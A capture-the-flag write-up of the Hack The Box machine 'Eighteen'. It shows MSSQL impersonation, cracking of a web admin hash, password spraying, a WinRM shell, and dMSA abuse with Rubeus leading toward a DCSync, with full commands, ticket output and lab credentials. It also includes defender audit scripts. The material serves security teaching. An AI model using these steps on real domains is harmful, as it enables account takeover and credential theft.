Hackthebox: Eighteen

Foued SAIDI

Overview

Eighteen is an easy-difficulty Windows machine running a Domain Controller (DC01). We start with MSSQL credentials found during enumeration, pivot through the database to extract a web application admin hash, crack it, and spray the password across domain users to land a WinRM shell. From there, we abuse the Delegated Managed Service Account (dMSA) feature introduced in Windows Server 2025 to impersonate the Administrator and perform a DCSync, fully compromising the domain.

Eighteen-info-card

Reconnaissance

We begin with a full port scan using nmap:

PORT     STATE SERVICE  VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://eighteen.htb/
|_http-server-header: Microsoft-IIS/10.0
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-ntlm-info:
| 10.129.116.222:1433:
| Target_Name: EIGHTEEN
| NetBIOS_Domain_Name: EIGHTEEN
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: eighteen.htb
| DNS_Computer_Name: DC01.eighteen.htb
| DNS_Tree_Name: eighteen.htb
|_ Product_Version: 10.0.26100
| ms-sql-info:
| 10.129.116.222:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2025-11-19T10:36:21+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-11-19T03:21:40
|_Not valid after: 2055-11-19T03:21:40
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (88%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (88%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 456.07 ms 10.10.16.1
2 456.19 ms 10.129.116.222

We have three open ports: HTTP (80), MSSQL (1433), and WinRM (5985). The web server redirects to eighteen.htb, so we add it to /etc/hosts. The MSSQL NTLM info reveals this is DC01.eighteen.htb, a Domain Controller, and the Product_Version of 10.0.26100 identifies Windows Server 2025.

MSSQL Enumeration

We have credentials kevin / iNa2we6haRj2gaw! for the MSSQL service. We connect using impacket-mssqlclient:

$ impacket-mssqlclient eighteen.htb/kevin:'iNa2we6haRj2gaw!'@10.129.116.222
Impacket v0.13.0.dev0+20251002.113829.eaf2e556 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
[!] Press help for extra shell commands
SQL (kevin guest@master)> enum_logins
name type_desc is_disabled sysadmin securityadmin serveradmin setupadmin processadmin diskadmin dbcreator bulkadmin
------ --------- ----------- -------- ------------- ----------- ---------- ------------ --------- --------- ---------
sa SQL_LOGIN 0 1 0 0 0 0 0 0 0
kevin SQL_LOGIN 0 0 0 0 0 0 0 0 0
appdev SQL_LOGIN 0 0 0 0 0 0 0 0 0
SQL (kevin guest@master)> exec_login as appdev
ERROR(DC01): Line 1: Incorrect syntax near the keyword 'as'.
SQL (kevin guest@master)> exec_as_login appdev
SQL (appdev appdev@master)> enum_db
name is_trustworthy_on
----------------- -----------------
master 0
tempdb 0
model 0
msdb 1
financial_planner 0
SQL (appdev appdev@master)> use financial_planner
ENVCHANGE(DATABASE): Old Value: master, New Value: financial_planner
INFO(DC01): Line 1: Changed database context to 'financial_planner'.
SQL (appdev appdev@financial_planner)> select name from sys.tables;
name
-----------
users
incomes
expenses
allocations
analytics
visits
SQL (appdev appdev@financial_planner)> select * from users;
id full_name username email password_hash is_admin created_at
---- --------- -------- ------------------ ------------------------------------------------------------------------------------------------------ -------- ----------
1002 admin admin [email protected] pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133 1 2025-10-29 05:39:03
SQL (appdev appdev@financial_planner)>

We enumerate the SQL logins and find an appdev account. Using exec_as_login, we impersonate appdev and discover a financial_planner database containing a users table. We extract the admin password hash — a pbkdf2:sha256 hash with 600,000 iterations.
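As an added defender-side check (not part of the original write-up), the following PowerShell audit, assuming the SqlServer module's Invoke-Sqlcmd and a login with VIEW ANY DEFINITION, lists the login-level IMPERSONATE grants that make an exec_as_login hop like kevin to appdev possible, and flags user databases marked TRUSTWORTHY:

```powershell
# Added audit (not code from the write-up). Assumes the SqlServer PowerShell module
# (Invoke-Sqlcmd) and a login holding VIEW ANY DEFINITION or sysadmin; add
# -Username/-Password if integrated auth is not available. -TrustServerCertificate
# is assumed to exist (SqlServer module 22+), needed because DC01 uses a self-signed cert.
Import-Module SqlServer

$instance = 'DC01.eighteen.htb'   # assumption: the instance from the write-up

$query = @"
-- 1. Login-level IMPERSONATE grants: the edge kevin -> appdev that exec_as_login used.
SELECT  grantee.name   AS grantee,
        target.name    AS can_impersonate,
        pe.state_desc  AS state
FROM    sys.server_permissions AS pe
JOIN    sys.server_principals  AS grantee ON grantee.principal_id = pe.grantee_principal_id
JOIN    sys.server_principals  AS target  ON target.principal_id  = pe.major_id
WHERE   pe.class_desc = 'SERVER_PRINCIPAL'
  AND   pe.permission_name = 'IMPERSONATE'
  AND   pe.state_desc LIKE 'GRANT%';

-- 2. User databases flagged TRUSTWORTHY (msdb is by default; user databases should not be),
--    with whether the owner is sysadmin: code in such a database runs with the owner's rights.
SELECT  d.name                                                 AS database_name,
        SUSER_SNAME(d.owner_sid)                               AS owner_login,
        IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(d.owner_sid)) AS owner_is_sysadmin
FROM    sys.databases AS d
WHERE   d.is_trustworthy_on = 1
  AND   d.database_id > 4;   -- skip master, tempdb, model, msdb
"@

# Both result sets are returned as rows; review any grantee that is not an admin login.
Invoke-Sqlcmd -ServerInstance $instance -Query $query -TrustServerCertificate |
    Format-Table -AutoSize
```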

Cracking the Hash

The hash format is Werkzeug’s PBKDF2, commonly used in Flask applications. We write a quick Python cracker:

$ cat cracker.py
import sys
import hashlib
from tqdm import tqdm

if len(sys.argv) != 2:
    print(f"Usage: {sys.argv[0]} <wordlist>")
    sys.exit(1)

wordlist_path = sys.argv[1]

hash_string = input("Enter hash (pbkdf2:sha256:ITER$SALT$HEX): ").strip()

# Werkzeug format: pbkdf2:<digest>:<iterations>$<salt>$<hex digest>
try:
    method_part, salt_str, hash_hex = hash_string.split("$")
    algo, digest, iterations_str = method_part.split(":")
    iterations = int(iterations_str)
except ValueError:
    print("[!] Hash format looks wrong. Expected: pbkdf2:sha256:ITERATIONS$SALT$HEX_HASH")
    sys.exit(1)

salt = salt_str.encode()
target_hash = bytes.fromhex(hash_hex)

with open(wordlist_path, "r", encoding="utf-8", errors="ignore") as f:
    passwords = f.read().splitlines()

print(f"[+] Loaded {len(passwords)} passwords from {wordlist_path}")
print("[+] Cracking...")

found = False

for pwd in tqdm(passwords, unit="pwds"):
    # Same derivation Werkzeug performs: PBKDF2-HMAC with the stored salt and iteration count
    derived = hashlib.pbkdf2_hmac(
        digest,
        pwd.encode(),
        salt,
        iterations
    )
    if derived == target_hash:
        print(f"\n[+] Password found: {pwd}")
        found = True
        break

if not found:
    print("\n[-] Password not found in wordlist.")

$ python3 cracker.py /usr/share/wordlists/rockyou.txt
Enter hash (pbkdf2:sha256:ITER$SALT$HEX): pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133
[+] Loaded 14344392 passwords from /usr/share/wordlists/rockyou.txt
[+] Cracking...
0%| | 232/14344392 [00:22<384:20:08, 10.37pwds/s]
[+] Password found: iloveyou1
0%|

We crack the hash and recover the password: iloveyou1. We can now log in to the web application at http://eighteen.htb/dashboard with admin:iloveyou1.

Domain User Enumeration

Using the MSSQL access, we perform RID brute-forcing with netexec to enumerate domain users:

$ nxc  mssql 10.129.116.222 -u kevin -p 'iNa2we6haRj2gaw!' --local-auth --rid-brute
MSSQL 10.129.116.222 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
MSSQL 10.129.116.222 1433 DC01 [+] DC01\kevin:iNa2we6haRj2gaw!
MSSQL 10.129.116.222 1433 DC01 498: EIGHTEEN\Enterprise Read-only Domain Controllers
MSSQL 10.129.116.222 1433 DC01 500: EIGHTEEN\Administrator
MSSQL 10.129.116.222 1433 DC01 501: EIGHTEEN\Guest
MSSQL 10.129.116.222 1433 DC01 502: EIGHTEEN\krbtgt
MSSQL 10.129.116.222 1433 DC01 512: EIGHTEEN\Domain Admins
MSSQL 10.129.116.222 1433 DC01 513: EIGHTEEN\Domain Users
MSSQL 10.129.116.222 1433 DC01 514: EIGHTEEN\Domain Guests
MSSQL 10.129.116.222 1433 DC01 515: EIGHTEEN\Domain Computers
MSSQL 10.129.116.222 1433 DC01 516: EIGHTEEN\Domain Controllers
MSSQL 10.129.116.222 1433 DC01 517: EIGHTEEN\Cert Publishers
MSSQL 10.129.116.222 1433 DC01 518: EIGHTEEN\Schema Admins
MSSQL 10.129.116.222 1433 DC01 519: EIGHTEEN\Enterprise Admins
MSSQL 10.129.116.222 1433 DC01 520: EIGHTEEN\Group Policy Creator Owners
MSSQL 10.129.116.222 1433 DC01 521: EIGHTEEN\Read-only Domain Controllers
MSSQL 10.129.116.222 1433 DC01 522: EIGHTEEN\Cloneable Domain Controllers
MSSQL 10.129.116.222 1433 DC01 525: EIGHTEEN\Protected Users
MSSQL 10.129.116.222 1433 DC01 526: EIGHTEEN\Key Admins
MSSQL 10.129.116.222 1433 DC01 527: EIGHTEEN\Enterprise Key Admins
MSSQL 10.129.116.222 1433 DC01 528: EIGHTEEN\Forest Trust Accounts
MSSQL 10.129.116.222 1433 DC01 529: EIGHTEEN\External Trust Accounts
MSSQL 10.129.116.222 1433 DC01 553: EIGHTEEN\RAS and IAS Servers
MSSQL 10.129.116.222 1433 DC01 571: EIGHTEEN\Allowed RODC Password Replication Group
MSSQL 10.129.116.222 1433 DC01 572: EIGHTEEN\Denied RODC Password Replication Group
MSSQL 10.129.116.222 1433 DC01 1000: EIGHTEEN\DC01$
MSSQL 10.129.116.222 1433 DC01 1101: EIGHTEEN\DnsAdmins
MSSQL 10.129.116.222 1433 DC01 1102: EIGHTEEN\DnsUpdateProxy
MSSQL 10.129.116.222 1433 DC01 1601: EIGHTEEN\mssqlsvc
MSSQL 10.129.116.222 1433 DC01 1602: EIGHTEEN\SQLServer2005SQLBrowserUser$DC01
MSSQL 10.129.116.222 1433 DC01 1603: EIGHTEEN\HR
MSSQL 10.129.116.222 1433 DC01 1604: EIGHTEEN\IT
MSSQL 10.129.116.222 1433 DC01 1605: EIGHTEEN\Finance
MSSQL 10.129.116.222 1433 DC01 1606: EIGHTEEN\jamie.dunn
MSSQL 10.129.116.222 1433 DC01 1607: EIGHTEEN\jane.smith
MSSQL 10.129.116.222 1433 DC01 1608: EIGHTEEN\alice.jones
MSSQL 10.129.116.222 1433 DC01 1609: EIGHTEEN\adam.scott
MSSQL 10.129.116.222 1433 DC01 1610: EIGHTEEN\bob.brown
MSSQL 10.129.116.222 1433 DC01 1611: EIGHTEEN\carol.white
MSSQL 10.129.116.222 1433 DC01 1612: EIGHTEEN\dave.green

We now have a list of domain users. Let’s spray the cracked password iloveyou1 across them via WinRM.

User Flag - Password Spraying

We spray the password against all discovered domain users over WinRM:

$ nxc  winrm 10.129.116.222 -u users -p 'iloveyou1'
WINRM 10.129.116.222 5985 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
WINRM 10.129.116.222 5985 DC01 [-] eighteen.htb\jamie.dunn:iloveyou1
WINRM 10.129.116.222 5985 DC01 [-] eighteen.htb\jane.smith:iloveyou1
WINRM 10.129.116.222 5985 DC01 [-] eighteen.htb\alice.jones:iloveyou1
WINRM 10.129.116.222 5985 DC01 [+] eighteen.htb\adam.scott:iloveyou1 (Pwn3d!)

We get a hit on adam.scott:iloveyou1. We connect using evil-winrm and grab the user flag:

$ evil-winrm -i 10.129.116.222 -u adam.scott -p iloveyou1

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adam.scott\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\adam.scott\desktop> cat user.txt
d6d73b2bfe99ca5ceaf483e446443f74
*Evil-WinRM* PS C:\Users\adam.scott\desktop>

Privilege Escalation - dMSA Abuse

Windows Server 2025 introduces Delegated Managed Service Accounts (dMSA), a new account type designed to replace legacy service accounts. The key feature we abuse here is the msDS-ManagedAccountPrecededByLink attribute — when a dMSA “supersedes” another account, the KDC grants it all the privileges of the preceded account, including its keys.

Since adam.scott has the ability to create dMSA objects in the OU=Staff organizational unit, we can:

  1. Create a new dMSA
  2. Set its msDS-ManagedAccountPrecededByLink to point to the Administrator account
  3. Set msDS-DelegatedMSAState to 2 (indicating migration is complete)
  4. Request a TGT as the dMSA, which will carry the Administrator’s keys

First, we create the dMSA and configure the ACLs:

*Evil-WinRM* PS C:\Users\adam.scott\Documents> New-ADServiceAccount -Name "testdmsa" `
-DNSHostName "testdmsa.eighteen.htb" `
-CreateDelegatedServiceAccount `
-KerberosEncryptionType AES256 `
-PrincipalsAllowedToRetrieveManagedPassword "adam.scott" `
-Path "OU=Staff,DC=eighteen,DC=htb"
*Evil-WinRM* PS C:\Users\adam.scott\Documents> $sid = (Get-ADUser -Identity "adam.scott").SID
$acl = Get-Acl "AD:\CN=testdmsa,OU=Staff,DC=eighteen,DC=htb"
$rule = New-Object System.DirectoryServices.ActiveDirectoryAccessRule($sid,"GenericAll","Allow")
$acl.AddAccessRule($rule)
Set-Acl -Path "AD:\CN=testdmsa,OU=Staff,DC=eighteen,DC=htb" -AclObject $acl
*Evil-WinRM* PS C:\Users\adam.scott\Documents> Set-ADServiceAccount -Identity testdmsa -Replace @{
'msDS-ManagedAccountPrecededByLink'='CN=Administrator,CN=Users,DC=eighteen,DC=htb';
'msDS-DelegatedMSAState'=2
}
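As an added defender-side audit (not code from the write-up), the following PowerShell script, assuming the RSAT ActiveDirectory module and read access to the domain and schema, checks the two conditions the escalation above depends on: dMSAs whose msDS-ManagedAccountPrecededByLink points at an AdminSDHolder-protected account, and OUs where principals hold the right to create dMSA objects, as adam.scott did on OU=Staff:

```powershell
# Added defender-side audit (not code from the write-up). Assumes the RSAT ActiveDirectory
# module (which also provides the AD: drive used below) and read access to domain and schema.
Import-Module ActiveDirectory

$domainDN = (Get-ADDomain).DistinguishedName

# 1. dMSA objects that supersede another account. adminCount=1 marks accounts protected by
#    AdminSDHolder (Administrator, Domain Admins members, ...). A link to such an account
#    with msDS-DelegatedMSAState=2 is exactly the state the Set-ADServiceAccount call above creates.
$findings = foreach ($d in (Get-ADObject -SearchBase $domainDN `
        -LDAPFilter '(objectClass=msDS-DelegatedManagedServiceAccount)' `
        -Properties 'msDS-ManagedAccountPrecededByLink','msDS-DelegatedMSAState','whenCreated')) {
    $link = $d.'msDS-ManagedAccountPrecededByLink'
    if (-not $link) { continue }                       # never superseded anything: skip
    $state  = [int]$d.'msDS-DelegatedMSAState'
    $target = Get-ADObject -Identity $link -Properties adminCount
    $priv   = ($target.adminCount -eq 1)
    $verdict = if ($priv -and $state -eq 2) { 'ALERT: privileged supersession' } else { 'review' }
    [pscustomobject]@{
        dMSA = $d.DistinguishedName; Precedes = $link; State = $state
        Privileged = $priv; Created = $d.whenCreated; Verdict = $verdict
    }
}
$findings | Format-Table -AutoSize

# 2. Which principals may create dMSAs in which OU? CreateChild scoped to the
#    msDS-DelegatedManagedServiceAccount class, CreateChild for all classes, or GenericAll
#    on the OU each make that OU a dMSA creation point for the principal.
$schemaNC  = (Get-ADRootDSE).schemaNamingContext
$classGuid = [guid](Get-ADObject -SearchBase $schemaNC `
        -LDAPFilter '(lDAPDisplayName=msDS-DelegatedManagedServiceAccount)' `
        -Properties schemaIDGUID).schemaIDGUID
$rights = [System.DirectoryServices.ActiveDirectoryRights]

$creators = foreach ($ou in Get-ADOrganizationalUnit -Filter *) {
    $acl = Get-Acl -Path ('AD:\' + $ou.DistinguishedName)
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $genAll = $ace.ActiveDirectoryRights.HasFlag($rights::GenericAll)
        $create = $ace.ActiveDirectoryRights.HasFlag($rights::CreateChild) -and
                  ($ace.ObjectType -eq [guid]::Empty -or $ace.ObjectType -eq $classGuid)
        if ($genAll -or $create) {
            [pscustomobject]@{ OU = $ou.DistinguishedName; Principal = $ace.IdentityReference.Value
                               Rights = $ace.ActiveDirectoryRights; Inherited = $ace.IsInherited }
        }
    }
}
$creators | Format-Table -AutoSize
```

Expect Domain Admins, Enterprise Admins and SYSTEM in the second table; any other principal listed against an OU should be justified or removed.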

Next, we upload Rubeus and compute the AES256 key for adam.scott, then request a TGT:

*Evil-WinRM* PS C:\Users\adam.scott\Documents> upload rubeus1.exe

Info: Uploading /home/kali/Desktop/Tools (2)/rubeus1.exe to C:\Users\adam.scott\Documents\rubeus1.exe

Data: 632832 bytes of 632832 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\adam.scott\Documents> mv rubeus1.exe Rubeus.exe
*Evil-WinRM* PS C:\Users\adam.scott\Documents> ./Rubeus.exe hash /password:'iloveyou1' /user:adam.scott /domain:eighteen.htb

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.3.3


[*] Action: Calculate Password Hash(es)

[*] Input password : iloveyou1
[*] Input username : adam.scott
[*] Input domain : eighteen.htb
[*] Salt : EIGHTEEN.HTBadam.scott
[*] rc4_hmac : 9964DAE494A77414E34AFF4F34412166
[*] aes128_cts_hmac_sha1 : 041716887B5EFBA3BA1DCDDAD9BBE98E
[*] aes256_cts_hmac_sha1 : 02F93F7E9E128C32449E2F20475AFCDFB6CC2B4444AC8FD0B02406AF018F75E5
[*] des_cbc_md5 : 9DCD08CB79833D58

*Evil-WinRM* PS C:\Users\adam.scott\Documents> ./Rubeus.exe asktgt /user:adam.scott /aes256:02F93F7E9E128C32449E2F20475AFCDFB6CC2B4444AC8FD0B02406AF018F75E5 /domain:eighteen.htb /nowrap

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.3.3

[*] Action: Ask TGT

[*] Using aes256_cts_hmac_sha1 hash: 02F93F7E9E128C32449E2F20475AFCDFB6CC2B4444AC8FD0B02406AF018F75E5
[*] Building AS-REQ (w/ preauth) for: 'eighteen.htb\adam.scott'
[*] Using domain controller: fe80::1a5e:1ffe:1b5d:e732%3:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIFpjCCBaKgAwIBBaEDAgEWooIEqTCCBKVhggShMIIEnaADAgEFoQ4bDEVJR0hURUVOLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMZWlnaHRlZW4uaHRio4IEYTCCBF2gAwIBEqEDAgECooIETwSCBEsw+u+xS26gdiXbpbFgTotyUQazQBd6ABbxjGK8InytxS8Y9yXj96Za1OwpyvgY59Uwvjy4zBKNZq6y7JXV8z8RgRvrNOqCTSBBNv//2NXtp5r+D5K01lDF8XMFVtrtYg0r6bKGPzxA9YrJSRe3NoCpCOyyxz2cgqteLwZxHdKvCuBzV5Oh57Gqob295yAaQrlJJvqWwgAOM5o57AXe6Y1NpCNSRMTqtul3f4T0H7RABoMc6bsNcj1rMc0F80FuPLkeLaSin+S3PZSL/8YgcILpNCRGHMn7czpN5Ychk046JwhIvIJDM2PeB2bJyiAVtTJl37Gnz536JyfBaMPjhem0eQLLh/7H5Ly3UOuGuHmTtR4ME6H1GfjIR7/fGJ0OUu80RQko7jWGCNH5F++tqUj+ws3lPJi82SByJVpSLyKZd9cy+6ISvUlY+wteIY3wES9vy5v3Q3B02uLN4vZ1Rn10ZgoiWuA5qzUghowFm0VHQd+tR9PPAS85YsHX2opqJ5TljBS295M7hPGXbLI4HGbmwl0F7lpG1EioszardVIsEPbSRhv37DRcKt8sqGhXePfd5avltJ9K2VstpH2n9OIsuQ0oxh0Rzbf3/TfLvIlCoTRG78LdaPndl/w/bYrSj+aKPYCX3p3V9IO0Lrwo8mDsTlKp+NIJA6edYyk+8h9CvRqpZNVWmuTZMhuCEhNy3+1qnGAeYLXMuHDvGFNdDaYxkoUrYUpbe/JmWT5s5TsCSgSAns0og8oExhXFpLMmtrqPhvNZr+F4LZUS0a1YxakIMKbwmTQ8s3Bpk1wnHIpi7BPMq1vfTV85zHIbyXDIinHhuoIT5xfqGtf3tF6Hu0BvI1gP37nsisSSY5HWg7fLiET3Hdf06lUy8Bahhsk2vf4HXzOx/7CRFoBcT8LggIMGiuk8JWSwkiGb9VWOcWFpYw3jpwBioJBRzR7Le648LSSUCleBLgexTakbPs/+Oh1CBUWp5VxyGF7qOpgdW3Nvl9ajKjTiXpA6cn75+kMKxc+lsowaos9Gx49KmN/uBsHpgWRfkX/7S3NXhyh7rFFgFB9FYmgN2IAxMJR13e/Zpe1mc926ZQydvDuIKXvYt3GAYYaVk92NimmnrT6ika4cnxQ20SpPVOsL04DblgYX02tL4/ZRT5AhtELAzNpZOUVzY26SciwLtLl3XyBsfeBaTWh3lMaWvtrIrhFqPjsk3yW/yp74s+j/AAh9vcbGCDvKgK0yiwEZIhU7RdJD7x3eQZZFWAS00ulEgmb4Z3BmNep1qhKPK2lGCnglxoxJdN9iFfcy2UXUJufMQ2D90e6pHSpofHmJc2SOs04tTynWpYuIVPH13WyeG5RYf8nOCWuwzjfXnIwkJjp3KoN0ouv4GOk+s2bLDfnw0hzd32/Wlg1b2LS+AGYzgYjwAyrdlVyB2XfoIHDXfKJjBLvOp7oUAdpOsJBbWud+E9dpo4HoMIHloAMCAQCigd0Egdp9gdcwgdSggdEwgc4wgcugKzApoAMCARKhIgQgfW5N5UjEp1VTzTCh29CeaExi2BUrlwJtVKDiYdMzFAmhDhsMRUlHSFRFRU4uSFRCohcwFaADAgEBoQ4wDBsKYWRhbS5zY290dKMHAwUAQOEAAKURGA8yMDI1MTExOTE1MDIyNFqmERgPMjAyNTExMjAwMTAyMjRapxEYDzIwMjUxMTI2MTUwMjI0WqgOGwxFSUdIVEVFTi5IVEKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDGVpZ2h0ZWVuLmh0Yg==

ServiceName : krbtgt/eighteen.htb
ServiceRealm : EIGHTEEN.HTB
UserName : adam.scott (NT_PRINCIPAL)
UserRealm : EIGHTEEN.HTB
StartTime : 11/19/2025 7:02:24 AM
EndTime : 11/19/2025 5:02:24 PM
RenewTill : 11/26/2025 7:02:24 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : fW5N5UjEp1VTzTCh29CeaExi2BUrlwJtVKDiYdMzFAk=
ASREP (key) : 02F93F7E9E128C32449E2F20475AFCDFB6CC2B4444AC8FD0B02406AF018F75E5

Now we use the /dmsa flag in Rubeus to request a TGS as testdmsa$, which will inherit the Administrator’s credentials:

*Evil-WinRM* PS C:\Users\adam.scott\Documents> ./Rubeus.exe asktgs /targetuser:testdmsa$ /service:krbtgt/eighteen.htb /dmsa /opsec /ptt /nowrap  /ticket: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

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.3.3

[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building DMSA TGS-REQ request for 'testdmsa$' from 'adam.scott'
[+] Sequence number is: 461317186
[*] Using domain controller: DC01.eighteen.htb (fe80::1a5e:1ffe:1b5d:e732%3)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):

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

ServiceName : krbtgt/EIGHTEEN.HTB
ServiceRealm : EIGHTEEN.HTB
UserName : testdmsa$ (NT_PRINCIPAL)
UserRealm : eighteen.htb
StartTime : 11/19/2025 7:02:38 AM
EndTime : 11/19/2025 7:17:38 AM
RenewTill : 11/26/2025 7:02:24 AM
Flags : name_canonicalize, pre_authent, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : uYmVOMdoavbs5aAbzgK/8hyY6nEAfGfUra/HWDmKgpI=
Current Keys for testdmsa$: (aes256_cts_hmac_sha1) BB89D70E8C37CD6EE283DC4C7F9356BFE256D1DA23DCDCAE221B7A88D0CD1DC8


*Evil-WinRM* PS C:\Users\adam.scott\Documents> klist

Current LogonId is 0:0x196093

Cached Tickets: (1)

#0> Client: testdmsa$ @ eighteen.htb
Server: krbtgt/EIGHTEEN.HTB @ EIGHTEEN.HTB
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 11/19/2025 7:02:38 (local)
End Time: 11/19/2025 7:17:38 (local)
Renew Time: 11/26/2025 7:02:24 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

The ticket is now cached. We have a TGT for testdmsa$ that carries the Administrator’s keys.

Tunneling with Ligolo-ng

To use the ticket from our attacking machine, we set up a ligolo-ng tunnel, running the proxy on Kali and the agent on DC01 as adam.scott:

┌──(kali㉿kali)-[~/Downloads/ligolo-ng_proxy_0.8.2_linux_amd64]
└─$ sudo ip tuntap add user kali mode tun ligolo
[sudo] password for kali:

┌──(kali㉿kali)-[~/Downloads/ligolo-ng_proxy_0.8.2_linux_amd64]
└─$ sudo ip link set ligolo up


$ ./proxy -selfcert
INFO[0000] Loading configuration file ligolo-ng.yaml
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
INFO[0000] Listening on 0.0.0.0:11601
INFO[0000] Starting Ligolo-ng Web, API URL is set to: http://127.0.0.1:8080
WARN[0000] Ligolo-ng API is experimental, and should be running behind a reverse-proxy if publicly exposed.
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/

Made in France ♥ by @Nicocha30!
Version: 0.8.2

[Agent : EIGHTEEN\adam.scott@DC01] »
ligolo-ng » INFO[7164] Agent joined. id=005056b0cf44 name="EIGHTEEN\\adam.scott@DC01" remote="10.129.136.7:61127"
ligolo-ng »
ligolo-ng » session
? Specify a session : 2 - EIGHTEEN\adam.scott@DC01 - 10.129.136.7:61127 - 005056b0cf44
[Agent : EIGHTEEN\adam.scott@DC01] » start
INFO[7195] Starting tunnel to EIGHTEEN\adam.scott@DC01 (005056b0cf44)
[Agent : EIGHTEEN\adam.scott@DC01] » ERRO[7226] connection was refused
ERRO[7281] connection was refused
[Agent : EIGHTEEN\adam.scott@DC01] »
[Agent : EIGHTEEN\adam.scott@DC01] »

DCSync - Dumping the Administrator Hash

We convert the base64 ticket to a .kirbi file, then to a .ccache for use with Impacket:


┌──(kali㉿kali)-[~/Downloads/ligolo-ng_proxy_0.8.2_linux_amd64]
└─$ nano ticket.kirbi

┌──(kali㉿kali)-[~/Downloads/ligolo-ng_proxy_0.8.2_linux_amd64]
└─$ cat ticket.kirbi | base64 -d > real.kirbi


┌──(kali㉿kali)-[~/Downloads/ligolo-ng_proxy_0.8.2_linux_amd64]
└─$ ticketConverter.py real.kirbi ticket.ccache

Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] converting kirbi to ccache...
[+] done

┌──(kali㉿kali)-[~/Downloads/ligolo-ng_proxy_0.8.2_linux_amd64]
└─$ export KRB5CCNAME=$(pwd)/ticket.ccache

We sync the clock with the DC (recall the 7-hour clock skew nmap reported; Kerberos rejects tickets more than a few minutes out of sync) and perform a DCSync through the tunnel to dump the Administrator's NTLM hash. The DC is reached as 240.0.0.1, the address ligolo-ng reserves for the agent's own host:

$ sudo ntpdate dc01.eighteen.htb ;impacket-secretsdump -k -no-pass eighteen.htb/testdmsa\$@dc01.eighteen.htb -dc-ip 240.0.0.1 -target-ip 240.0.0.1 -just-dc-user Administrator
2025-11-19 12:37:18.197197 (-0500) +25204.965372 +/- 0.473467 dc01.eighteen.htb 240.0.0.1 s1 no-leap
CLOCK: time stepped by 25204.965372
